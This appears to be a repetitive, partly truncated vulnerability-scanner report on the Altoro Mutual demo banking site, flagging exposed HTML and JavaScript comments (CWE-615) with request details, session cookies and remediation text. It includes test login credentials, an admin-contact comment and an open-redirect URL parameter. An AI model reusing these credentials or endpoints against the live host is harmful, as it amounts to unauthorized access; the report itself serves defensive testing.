GET - https://65.61.137.117:8443/
7 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- Keywords:Altoro Mutual, online banking, banking, checking,
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Reference:
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - https://65.61.137.117:8443/disclaimer.htm?url=http://www.microsoft.com
1 Javascript Comment(s) found
// if redirection is in the application's domain, don't ask for
Request: GET https://65.61.137.117:8443/disclaimer.htm?url=http://www.microsoft.com HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=9B8C68C14BB9B053BB189485F1F888A4
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: Limit Exceeded. 9 more item(s) were reported.
GET - https://demo.testfire.net/index.jsp?content=personal.htm
GET - https://demo.testfire.net/index.jsp?content=business.htm
GET - https://demo.testfire.net/subscribe.jsp
POST - https://demo.testfire.net/doSubscribe
GET - https://demo.testfire.net/default.jsp?content=security.htm
GET - https://demo.testfire.net/survey_questions.jsp
GET - https://demo.testfire.net/survey_questions.jsp?step=a
GET - https://demo.testfire.net/status_check.jsp
GET - https://demo.testfire.net/swagger/index.html
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - https://65.61.137.117/index.jsp
7 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- Keywords:Altoro Mutual, online banking, banking, checking,
savings, accounts -->
Request: GET https://65.61.137.117/index.jsp HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - http://65.61.137.117/
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - http://demo.testfire.net:8080/login.jsp
Potentially sensitive comments found
"admin" found in
<!-- To get the latest admin login, please contact SiteOps at 415-555-6159 -->
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - http://demo.testfire.net:8080/disclaimer.htm?url=http://www.netscape.com
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
POST - http://demo.testfire.net:8080/sendFeedback
6 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
Request: POST http://demo.testfire.net:8080/sendFeedback HTTP/1.1
Cookie: JSESSIONID=03939398EA63CCAEE93295DC28E42282
Origin: http://demo.testfire.net:8080
Upgrade-Insecure-Requests: 1
Referer: http://demo.testfire.net:8080/feedback.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Length: 126
Content-Type: application/x-www-form-urlencoded
cfile=comments.txt&name=CHSuser&email_addr=jsmith20%40kelev.biz&subject=_WSETESTDATA&comments=_WSETESTAREADATA&submit=+Submit+
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET -
http://demo.testfire.net/disclaimer.htm?url=http://www.netscape.com
1 Javascript Comment(s) found
// if redirection is in the application's domain, don't ask for
authorization
Request: GET
http://demo.testfire.net/disclaimer.htm?url=http://www.netscape.com
HTTP/1.1
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
cfile=comments.txt&name=CHSuser&email_addr=jsmith20%40kelev.biz&subject=_WSETESTDATA&comments=_WSETESTAREADATA&submit=+Submit+
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - http://65.61.137.117:8080/disclaimer.htm?url=http://www.netscape.com
1 Javascript Comment(s) found
// if redirection is in the application's domain, don't ask for
Request: GET http://65.61.137.117:8080/disclaimer.htm?url=http://www.netscape.com HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=76AA5AC0228D700D9219ED73F9533B78
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - http://65.61.137.117:8080/disclaimer.htm?url=http://www.microsoft.com
1 Javascript Comment(s) found
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - http://65.61.137.117:8080/feedback.jsp
7 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- Dave- Hard code this into the final script - Possible security
problem.
Re-generated every Tuesday and old files are saved
to .bak format at L:\backup\website\oldfiles --->
Request: GET http://65.61.137.117:8080/feedback.jsp HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=76AA5AC0228D700D9219ED73F9533B78
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - http://65.61.137.117:8080/login.jsp
Potentially sensitive comments found
"admin" found in
<!-- To get the latest admin login, please contact SiteOps at 415-555-6159 -->
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - https://65.61.137.117:8443/login.jsp
Potentially sensitive comments found
"admin" found in
<!-- To get the latest admin login, please contact SiteOps at 415-555-6159 -->
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - http://65.61.137.117/search.jsp?query=_WSETESTDATA
6 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
Request: GET http://65.61.137.117/search.jsp?query=_WSETESTDATA
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http
Reference:
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - http://65.61.137.117:8080/search.jsp?query=_WSETESTDATA
6 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
Request: GET
http://65.61.137.117:8080/search.jsp?query=_WSETESTDATA HTTP/1.1
Cookie: JSESSIONID=76AA5AC0228D700D9219ED73F9533B78
Upgrade-Insecure-Requests: 1
Referer: http://65.61.137.117:8080/
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - https://demo.testfire.net:8443/login.jsp
Potentially sensitive comments found
"admin" found in
<!-- To get the latest admin login, please contact SiteOps at 415-555-6159 -->
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http
Reference:
Evidence:
DetectionDetails: HTML or Javascript comments found
GET -
http://demo.testfire.net:8080/index.jsp?content=inside_contact.htm
7 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- Keywords:Altoro Mutual, online banking, contact information,
subscriptions -->
Request: GET
http://demo.testfire.net:8080/index.jsp?content=inside_contact.htm
HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=03939398EA63CCAEE93295DC28E42282
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
comments
While adding general comments is very useful, some programmers
tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - http://demo.testfire.net:8080/
7 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- Keywords:Altoro Mutual, online banking, banking, checking,
savings, accounts -->
Request: GET http://demo.testfire.net:8080/ HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: Limit Exceeded. 9 more item(s) were reported.
GET - https://65.61.137.117:8443/index.jsp?content=personal.htm
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Evidence:
DetectionDetails: HTML or Javascript comments found
GET -
https://65.61.137.117:8443/index.jsp?content=inside_contact.htm
7 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- Keywords:Altoro Mutual, online banking, contact information,
subscriptions -->
Request: GET
https://65.61.137.117:8443/index.jsp?content=inside_contact.htm
HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=9B8C68C14BB9B053BB189485F1F888A4
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
POST - http://demo.testfire.net:8080/doLogin
Potentially sensitive comments found
"admin" found in
<!-- To get the latest admin login, please contact SiteOps at 415-555-6159 -->
uid=CHSuser&passw=Passwor1&btnSubmit=Login
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - http://demo.testfire.net:8080/index.jsp
7 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- Keywords:Altoro Mutual, online banking, banking, checking,
savings, accounts -->
Request: GET http://demo.testfire.net:8080/index.jsp HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=03939398EA63CCAEE93295DC28E42282
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - https://demo.testfire.net:8443/
7 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- Keywords:Altoro Mutual, online banking, banking, checking,
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - https://demo.testfire.net:8443/feedback.jsp
7 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- Dave- Hard code this into the final script - Possible security
problem.
Re-generated every Tuesday and old files are saved
to .bak format at L:\backup\website\oldfiles --->
Request: GET https://demo.testfire.net:8443/feedback.jsp HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=44C815873649B1433E310F19F9B9450B
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - http://65.61.137.117/index.jsp?content=inside_contact.htm
7 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- Keywords:Altoro Mutual, online banking, contact information,
subscriptions -->
Request: GET
http://65.61.137.117/index.jsp?content=inside_contact.htm HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
POST - https://65.61.137.117:8443/doLogin
uid=CHSuser&passw=Passwor1&btnSubmit=Login
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - https://65.61.137.117:8443/index.jsp
7 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- Keywords:Altoro Mutual, online banking, banking, checking,
savings, accounts -->
Request: GET https://65.61.137.117:8443/index.jsp HTTP/1.1
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Reference:
https://cwe.mitre.org/data/definitions/615.html
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - http://demo.testfire.net/login.jsp
Potentially sensitive comments found
"admin" found in
<!-- To get the latest admin login, please contact SiteOps at 415-555-6159 -->
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - https://65.61.137.117/search.jsp?query=_WSETESTDATA
6 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
Request: GET https://65.61.137.117/search.jsp?query=_WSETESTDATA
HTTP/1.1
Cookie: JSESSIONID=3804E3482E26BDF0C73231467A2AC9D4
Upgrade-Insecure-Requests: 1
Referer: https://65.61.137.117/
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - http://65.61.137.117/index.jsp
7 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- Keywords:Altoro Mutual, online banking, banking, checking,
savings, accounts -->
Request: GET http://65.61.137.117/index.jsp HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=7DEA7694E36255C4C48824F9A0DE4E13
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: Limit Exceeded. 9 more item(s) were reported.
GET - http://65.61.137.117/index.jsp?content=personal.htm
GET - http://65.61.137.117/index.jsp?content=business.htm
GET - http://65.61.137.117/subscribe.jsp
POST - http://65.61.137.117/doSubscribe
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http
Reference:
https://cwe.mitre.org/data/definitions/615.html
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET -
https://demo.testfire.net/disclaimer.htm?url=http://www.microsoft.com
1 Javascript Comment(s) found
// if redirection is in the application's domain, don't ask for
authorization
Request: GET
https://demo.testfire.net/disclaimer.htm?url=http://www.microsoft.com
HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=0565231311CE173563DB02789CEE78E3
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - https://demo.testfire.net/feedback.jsp
7 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- Dave- Hard code this into the final script - Possible security
problem.
Re-generated every Tuesday and old files are saved
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Reference:
Evidence:
DetectionDetails: HTML or Javascript comments found
POST - https://demo.testfire.net/doLogin
Potentially sensitive comments found
"admin" found in
<!-- To get the latest admin login, please contact SiteOps at 415-555-6159 -->
uid=CHSuser&passw=Passwor1&btnSubmit=Login
Remediation:
Remove comments which have sensitive information about the
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - http://demo.testfire.net:8080/feedback.jsp
7 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: Limit Exceeded. 9 more item(s) were reported.
GET - http://demo.testfire.net:8080/index.jsp?content=personal.htm
GET - http://demo.testfire.net:8080/index.jsp?content=business.htm
GET - http://demo.testfire.net:8080/subscribe.jsp
POST - http://demo.testfire.net:8080/doSubscribe
GET - http://demo.testfire.net:8080/default.jsp?content=security.htm
GET - http://demo.testfire.net:8080/survey_questions.jsp
GET - http://demo.testfire.net:8080/survey_questions.jsp?step=a
GET - http://demo.testfire.net:8080/status_check.jsp
GET - http://demo.testfire.net:8080/swagger/index.html
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET -
http://demo.testfire.net/disclaimer.htm?url=http://www.microsoft.com
1 Javascript Comment(s) found
// if redirection is in the application's domain, don't ask for
authorization
Request: GET
http://demo.testfire.net/disclaimer.htm?url=http://www.microsoft.com
HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=B95638AFC2EBB1AEEE06E0A48503002C
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET -
https://demo.testfire.net:8443/disclaimer.htm?url=http://www.microsoft.com
1 Javascript Comment(s) found
// if redirection is in the application's domain, don't ask for
Request: GET
https://demo.testfire.net:8443/disclaimer.htm?url=http://www.microsoft.com HTTP/1.1
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
cfile=comments.txt&name=CHSuser&email_addr=jsmith20%40kelev.biz&subject=_WSETESTDATA&comments=_WSETESTAREADATA&submit=+Submit+
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - https://65.61.137.117:8443/search.jsp?query=_WSETESTDATA
6 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
Request: GET
https://65.61.137.117:8443/search.jsp?query=_WSETESTDATA
HTTP/1.1
Cookie: JSESSIONID=9B8C68C14BB9B053BB189485F1F888A4
Upgrade-Insecure-Requests: 1
Referer: https://65.61.137.117:8443/
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - http://demo.testfire.net:8080/search.jsp?query=_WSETESTDATA
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - https://65.61.137.117/index.jsp?content=inside_contact.htm
7 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- Keywords:Altoro Mutual, online banking, contact information,
subscriptions -->
Request: GET
https://65.61.137.117/index.jsp?content=inside_contact.htm HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=3804E3482E26BDF0C73231467A2AC9D4
Remediation:
Remove comments which have sensitive information about the
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - https://65.61.137.117/login.jsp
Potentially sensitive comments found
"admin" found in
<!-- To get the latest admin login, please contact SiteOps at 415-555-6159 -->
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: Limit Exceeded. 9 more item(s) were reported.
GET - https://65.61.137.117/index.jsp?content=personal.htm
GET - https://65.61.137.117/index.jsp?content=business.htm
GET - https://65.61.137.117/subscribe.jsp
POST - https://65.61.137.117/doSubscribe
GET - https://65.61.137.117/default.jsp?content=security.htm
GET - https://65.61.137.117/survey_questions.jsp
GET - https://65.61.137.117/survey_questions.jsp?step=a
GET - https://65.61.137.117/status_check.jsp
GET - https://65.61.137.117/swagger/index.html
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
